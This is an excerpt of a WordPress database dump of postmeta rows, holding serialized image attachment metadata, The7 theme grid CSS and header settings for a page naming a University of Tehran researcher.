(14803,2841,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:302;s:6:\"height\";i:196;s:4:\"file\";s:16:\"2022/10/m2-2.jpg\";s:8:\"filesize\";i:108077;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"m2-2-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20025;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m2-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9032;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14804,2795,'the7_shortcodes_dynamic_css','a:2:{s:32:\"749b6f0dd2c21620b41274643fc9c5e4\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-749b6f0dd2c21620b41274643fc9c5e4.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(14805,2843,'_wp_attached_file','2022/10/m3-1.jpg'),
(14806,2843,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:302;s:6:\"height\";i:94;s:4:\"file\";s:16:\"2022/10/m3-1.jpg\";s:8:\"filesize\";i:60389;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"m3-1-300x93.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9567;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"m3-1-150x94.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5895;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14807,2847,'_edit_lock','1665769559:1'),
(14808,2848,'_wp_attached_file','2022/10/w151.jpg'),
(14809,2848,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:144;s:6:\"height\";i:187;s:4:\"file\";s:16:\"2022/10/w151.jpg\";s:8:\"filesize\";i:32454;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w151-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4489;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14810,2847,'_thumbnail_id','2848'),
(14811,2847,'_edit_last','1'),
(14812,2847,'_dt_sidebar_position','disabled'),
(14813,2847,'_dt_sidebar_widgetarea_id','sidebar_1'),
(14814,2847,'_dt_sidebar_hide_on_mobile','0'),
(14815,2847,'_dt_footer_show','1'),
(14816,2847,'_dt_footer_widgetarea_id','sidebar_2'),
(14817,2847,'_dt_footer_hide_on_mobile','0'),
(14818,2847,'_dt_header_title','fancy'),
(14819,2847,'_dt_header_background','normal'),
(14820,2847,'_dt_header_background_below_slideshow','disabled'),
(14821,2847,'_dt_header_transparent_bg_color_scheme','light'),
(14822,2847,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(14823,2847,'_dt_header_transparent_top_bar_bg_opacity','25'),
(14824,2847,'_dt_header_transparent_bg_color','#000000'),
(14825,2847,'_dt_header_transparent_bg_opacity','50'),
(14826,2847,'_dt_header_disabled_background','normal'),
(14827,2847,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(14828,2847,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(14829,2847,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(14830,2847,'_dt_header_disabled_transparent_bg_color','#000000'),
(14831,2847,'_dt_header_disabled_transparent_bg_opacity','50'),
(14832,2847,'_dt_page_overrides_top_margin',''),
(14833,2847,'_dt_page_overrides_right_margin',''),
(14834,2847,'_dt_page_overrides_bottom_margin',''),
(14835,2847,'_dt_page_overrides_left_margin',''),
(14836,2847,'_dt_mobile_page_padding_top',''),
(14837,2847,'_dt_mobile_page_padding_right',''),
(14838,2847,'_dt_mobile_page_padding_bottom',''),
(14839,2847,'_dt_mobile_page_padding_left',''),
(14840,2847,'_dt_fancy_header_layout_heading',''),
(14841,2847,'_dt_fancy_header_title_aligment','center'),
(14842,2847,'_dt_fancy_header_height','300'),
(14843,2847,'_dt_fancy_header_padding-top','0px'),
(14844,2847,'_dt_fancy_header_padding-bottom','0px'),
(14845,2847,'_dt_fancy_header_breadcrumbs_heading',''),
(14846,2847,'_dt_fancy_header_breadcrumbs','disabled'),
(14847,2847,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(14848,2847,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(14849,2847,'_dt_fancy_header_title_heading',''),
(14850,2847,'_dt_fancy_header_title_mode','custom'),
(14851,2847,'_dt_fancy_header_title','Mahmoud Reza Delavar University of Tehran, Iran (WG IV/2)'),
(14852,2847,'_dt_fancy_header_title_font_size','30'),
(14853,2847,'_dt_fancy_header_title_line_height','36'),
(14854,2847,'_dt_fancy_header_text_transform','none'),
(14855,2847,'_dt_fancy_header_title_color_mode','color'),
(14856,2847,'_dt_fancy_header_title_color','#ffffff'),
(14857,2847,'_dt_fancy_header_subtitle_heading',''),
(14858,2847,'_dt_fancy_header_subtitle',''),
(14859,2847,'_dt_fancy_header_subtitle_font_size','18'),
(14860,2847,'_dt_fancy_header_subtitle_line_height','26'),
(14861,2847,'_dt_fancy_header_subtitle_text_transform','none'),
(14862,2847,'_dt_fancy_header_subtitle_color_mode','color'),
(14863,2847,'_dt_fancy_header_subtitle_color','#ffffff'),
(14864,2847,'_dt_fancy_header_bg_heading',''),
(14865,2847,'_dt_fancy_header_bg_color','#222222'),
(14866,2847,'_dt_fancy_header_bg_image_origin','custom'),
(14867,2847,'_dt_fancy_header_bg_image','a:0:{}'),
(14868,2847,'_dt_fancy_header_bg_repeat','no-repeat'),
(14869,2847,'_dt_fancy_header_bg_position_x','center'),
(14870,2847,'_dt_fancy_header_bg_position_y','center'),
(14871,2847,'_dt_fancy_header_bg_fullscreen','1'),
